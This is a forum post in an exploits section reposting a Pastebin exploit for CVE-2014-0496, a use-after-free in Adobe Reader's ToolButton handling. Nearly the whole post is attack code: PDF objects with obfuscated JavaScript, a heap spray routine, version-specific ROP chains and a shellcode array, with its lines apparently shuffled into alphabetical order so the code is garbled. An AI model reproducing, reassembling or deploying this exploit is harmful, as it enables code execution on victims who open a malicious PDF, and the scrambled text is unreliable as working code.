Jump to content
Nytro

CVE-2014-0496 Adobe Pdf Exploit ToolButton

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

[h=1]CVE-2014-0496 Adobe Pdf Exploit ToolButton[/h]

    

    @PhysicalDrive0

        });
    1 0 obj
    2 0 obj
    3 0 obj
    4 0 obj
    5 0 obj
    6 0 obj
    7 0 obj
      aaa += aaa;
            aa=dd13.split("%u");
                    aa[i]=str12+aa[i];
    /AcroForm 6 0 R
      addButtonFunc = function () {
            af1="aaaaa%aaaaaaaauaaaaaa";
            af1=af1[("112","a2s1","replace")](/a/g,'');
        app.addToolButton({
      app.addToolButton({
      app.alert('123');
        app.removeToolButton({
      as1211();
      bbb += aaa;
      bbb = bbb.substring(0, i11 / 2);
      bbb += sa;
      bbb += str;
                    break;
             ccc += ccc;
        cEnable: "addButtonFunc();"
          cEnable: "removeButtonFunc();"
          cExec: "1",
        cExec: "1",
            cName: "evil"
        cName: "evil",
          cName: "xxx",
    </config>
    <config xmlns="http://www.xfa.org/schema/xci/2.6/">
    /Count 1
            dd13=aa.join('%u');
            dd13=af1+dd13;
            dd13=xx13.join('%u');
    } else {
    } else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {
    } else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {
    endobj
    endstream
        for (i = 0; i < 0x1c / 2; i++) part1 += this[un12]("%u4141");
      for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";
        for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);
            for (i = 0; i < aa[tt1]; i++)
      for (i = 0; i < part2_len / 2 - 1; i++) part2 += this[un12]("%u4141");
      function as1211()
    function heapSpray(str, str_addr, r_addr) {
    function opp12(xx13)
      heapSpray(payload, ret_addr, r_addr);
    if (app.viewerVersion >= x11 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {
            if(ccc[tt] >= (0x40000*2))
              if(j)
      if (!r11) {
    if (vulnerable) {
              j=4-aa[i][tt1];
    /Kids [3 0 R]
    <</Length 10074>>
    <</Length 372>>
      obj_size = 0x330 + 0x1c;
      obj_size = 0x360 + 0x1c;
      obj_size = 0x370;
    /OpenAction 4 0 R
    /Pages 2 0 R
    <pageSet></pageSet>
    /Parent 2 0 R
      part1 += rop_addr;
    %%%%%PDF-6.5
    PE/%%%%%%
    <present><pdf><interactive>1</interactive></pdf></present>
      r11 = true;
      r_addr = 0x08a8;
      r_addr = 0x08e4;
      r_addr = 0x08e8;
      removeButtonFunc = function () {
      ret_addr = this[un12]("%u8003%u4a84");
      ret_addr = this[un12]("%ua83e%u4a82");
      ret_addr = this[un12]("%ua8df%u4a82");
      return;
            return dd13;
      rop_addr = this[un12]("%u08a8%u0c0c");
      rop_addr = this[un12]("%u08e4%u0c0c");
      rop_addr = this[un12]("%u08e8%u0c0c");
      rop = rop10;
      rop = rop11;
      rop = rop9;
    <</Size 8/Root 1 0 R>>
                    str12=new Array(j+1).join("0");
    stream
    <subform name="form1" layout="tb" locale="en_US">
    </subform></template></xdp:xdp>
    <template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
    trailer
    tt1=tt1[("112","a2s1","replace")](/a/g,'');
      tt=tt[("112","a2s1","replace")](/a/g,'');
    /tYPE/aCTION/S/JavaScript/JS 5 0 R>>
    /type /Page
    /Type /Page
    /Type /Pages
      un12='';
        un12=un12[("112","as1","replace")](/w/g,'');
      un12="uwnwwewwwswcwwwawwpwe";
      var aaa = this[un12]("%u0c0c");
      var arr = new Array();
      var bbb = aaa.substring(0, i1 / 2);
      var ccc = bbb.substring(0, i2 / 2);
      var ddd = ccc.substring(0, 0x80000 - i3);
      var eee = new Array();
    var executable = "";
      var i11 = 0x0c0c - 0x24;
      var i1 = r_addr - 0x24;
      var i2 = 0x4000 + 0xc000;
      var i3 = (0x1020 - 0x08) / 2;
    var obj_size;
      var part1 = "";
      var part2 = "";
      var part2_len = obj_size - part1[tt1] * 2;
      var payload = rop + shellcode;
    var r11 = false;
    var r_addr;
    var ret_addr;
    var rop;
    var rop10 = this[("123","1a1",un12)](opp12(xx132));
    var rop11 = this[("123","1a1",un12)](opp12(xx131));
    var rop9 = this[("123","1a1",un12)](opp12(xx133));
    var rop_addr;
      var sa = str_addr;
    var shellcode = this[("123","1a1",un12)](opp12(xx134));
    var tt1="alaaeaanaaagataaah";
      var tt="alaaeaanaagataah";
    var vulnerable = true;
    var xx131=new Array(0x822c.toString(16),0x4a85.toString(16),0xf129.toString(16),0x4a82.toString(16),0x597f.toString(16),0x4a85.toString(16),0x6038.toString(16),0x4a86.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5093.toString(16),0x4a85.toString(16),0xbc12.toString(16),0x2946.toString(16),0x0030.toString(16),0x4a85.toString(16),0x597f.toString(16),0x4a85.toString(16),0x0031.toString(16),0x4a85.toString(16),0x8a79.toString(16),0x81ea.toString(16),0x822c.toString(16),0x4a85.toString(16),0xf1d5.toString(16),0x4a83.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x6030.toString(16),0x4a86.toString(16),0x4864.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4856.toString(16),0x4a81.toString(16),0x05a0.toString(16),0x4a85.toString(16),0x0bc4.toString(16),0x4a86.toString(16),0x05a0.toString(16),0x4a85.toString(16),0xc376.toString(16),0x4a81.toString(16),0x63d0.toString(16),0x4a84.toString(16),0x0400.toString(16),0x0000.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0xd4f8.toString(16),0x4a85.toString(16),0x4864.toString(16),0x4a81.toString(16));
    var xx132=new Array(0x6015.toString(16),0x4a82.toString(16),0xe090.toString(16),0x4a82.toString(16),0x007d.toString(16),0x4a82.toString(16),0x0038.toString(16),0x4a85.toString(16),0x46d5.toString(16),0x4a82.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x5016.toString(16),0x4a80.toString(16),0x420c.toString(16),0x4a84.toString(16),0x4241.toString(16),0x4a81.toString(16),0x007d.toString(16),0x4a82.toString(16),0x6015.toString(16),0x4a82.toString(16),0x0030.toString(16),0x4a85.toString(16),0xb49d.toString(16),0x4a84.toString(16),0x6015.toString(16),0x4a82.toString(16),0x46d5.toString(16),0x4a82.toString(16),0x4197.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x4013.toString(16),0x4a81.toString(16),0xe036.toString(16),0x4a84.toString(16),0xa8df.toString(16),0x4a82.toString(16),0xadef.toString(16),0xd2fc.toString(16),0x0400.toString(16),0x0000.toString(16),0xb045.toString(16),0x55c8.toString(16),0x8b31.toString(16),0x4a81.toString(16),0x4197.toString(16),0x4a81.toString(16));
    var xx133=new Array(0x313d.toString(16),0x4a82.toString(16),0xa713.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x9038.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0xffff.toString(16),0xffff.toString(16),0x0000.toString(16),0x0000.toString(16),0x0040.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x1000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x155a.toString(16),0x4a80.toString(16),0x3a84.toString(16),0x4a84.toString(16),0xd4de.toString(16),0x4a82.toString(16),0x1f90.toString(16),0x4a80.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x9030.toString(16),0x4a84.toString(16),0x4122.toString(16),0x4a84.toString(16),0x76aa.toString(16),0x4a84.toString(16),0x7e7d.toString(16),0x4a80.toString(16),0x3178.toString(16),0x4a81.toString(16),0x0026.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x0000.toString(16),0x3a82.toString(16),0x4a84.toString(16),0x6c5e.toString(16),0x4a84.toString(16),0x76ab.toString(16),0x4a84.toString(16),0xfec2.toString(16),0x2bca.toString(16),0x0400.toString(16),0x0000.toString(16),0xaab9.toString(16),0x6d5d.toString(16),0x7984.toString(16),0x4a81.toString(16),0x3178.toString(16),0x4a81.toString(16));
    var xx134=new Array(0x88bf.toString(16),0xcb87.toString(16),0xdb8d.toString(16),0xd9c8.toString(16),0x2474.toString(16),0x5df4.toString(16),0xc929.toString(16),0x44b1.toString(16),0x7d31.toString(16),0x0314.toString(16),0x147d.toString(16),0xed83.toString(16),0x6afc.toString(16),0x1272.toString(16),0xf166.toString(16),0xd1a4.toString(16),0xf15d.toString(16),0xc866.toString(16),0x8e2c.toString(16),0x25b9.toString(16),0xfb34.toString(16),0x85cb.toString(16),0x8d3e.toString(16),0x6d27.toString(16),0x6d36.toString(16),0x37b3.toString(16),0x06bf.toString(16),0x97bd.toString(16),0x2e34.toString(16),0x977a.toString(16),0x3b52.toString(16),0x7e89.toString(16),0x1262.toString(16),0x6092.toString(16),0x1f04.toString(16),0x4701.toString(16),0x94e1.toString(16),0xbb9f.toString(16),0xfe62.toString(16),0xbc37.toString(16),0x1475.toString(16),0x76cc.toString(16),0x636e.toString(16),0xa689.toString(16),0x988f.toString(16),0x93cd.toString(16),0xd5c6.toString(16),0x5726.toString(16),0x07d9.toString(16),0x9877.toString(16),0x17eb.toString(16),0xca84.toString(16),0x5788.toString(16),0x1401.toString(16),0x9850.toString(16),0x1be7.toString(16),0xcd95.toString(16),0x200c.toString(16),0x3565.toString(16),0x22c5.toString(16),0xbe74.toString(16),0xe94f.toString(16),0x2b77.toString(16),0x7a09.toString(16),0xe07b.toString(16),0x265d.toString(16),0xf798.toString(16),0x5c8a.toString(16),0x7ca4.toString(16),0x8b4d.toString(16),0xc62c.toString(16),0x576a.toString(16),0x054e.toString(16),0x6fc0.toString(16),0x5db9.toString(16),0x95ac.toString(16),0x9f30.toString(16),0xdbc7.toString(16),0x110d.toString(16),0xb6f4.toString(16),0xb279.toString(16),0xc8fb.toString(16),0x4585.toString(16),0x3346.toString(16),0x2bc1.toString(16),0xd991.toString(16),0x5446.toString(16),0x3a3d.toString(16),0xb2fb.toString(16),0xbdb0.toString(16),0xbd04.toString(16),0x0444.toString(16),0x29f3.toString(16),0xeb3b.toString(16),0xe823.toString(16),0xc0ab.toString(16),0xc411.toString(16),0x4f4f.toString(16),0x6b23.toString(16),0xfdf5.toString(16),0xd743.toString(16),0x0bd1.toString(16),0x01dd.toString(16),0xf34f.toString(16),0xc988.toString(16),0xc9f9.toString(16),0x6a63.toString(16),0x6f51.toString(16),0x30ce.toString(16),0x6c25.toString(16),0x1af5.toString(16),0xecc2.toString(16),0x650a.toString(16),0x87ed.toString(16),0xe19b.toString(16),0x784a.toString(16),0x700c.toString(16),0x1d0c.toString(16),0x1a8e.toString(16),0xb89f.toString(16),0xa97d.toString(16),0x982e.toString(16),0x110a.toString(16),0x1475.toString(16),0x4a82.toString(16),0x701d.toString(16),0xacb4.toString(16),0xe8fe.toString(16),0xfff9.toString(16),0xc9b8.toString(16),0x8d69.toString(16),0x672b.toString(16),0x194a.toString(16),0x5bdb.toString(16),0xbfaa.toString(16),0xec4b.toString(16),0x53cf.toString(16),0xdde0.toString(16),0x23c6.toString(16),0x39b4.toString(16),0xbac9.toString(16),0x73a4.toString(16),0xee3b.toString(16),0x2575.toString(16),0xf1e9.toString(16),0xf4aa.toString(16),0x5dcd.toString(16),0xa2b4.toString(16),0x41c5.toString(16));
      vulnerable = false;
      while (1)
      while ((aaa[tt] + 28) < (0x8000*2)) aaa += aaa;
      while (sa[tt] < (xxx - r_addr)) sa += sa;
    x11=9;
    <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <</XFA 7 0 R>>
    <?xml version="1.0" encoding="UTF-8"?>
      xxx=0x0c0c;

Sursa: CVE-2014-0496 Adobe Pdf Exploit ToolButton - Pastebin.com

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...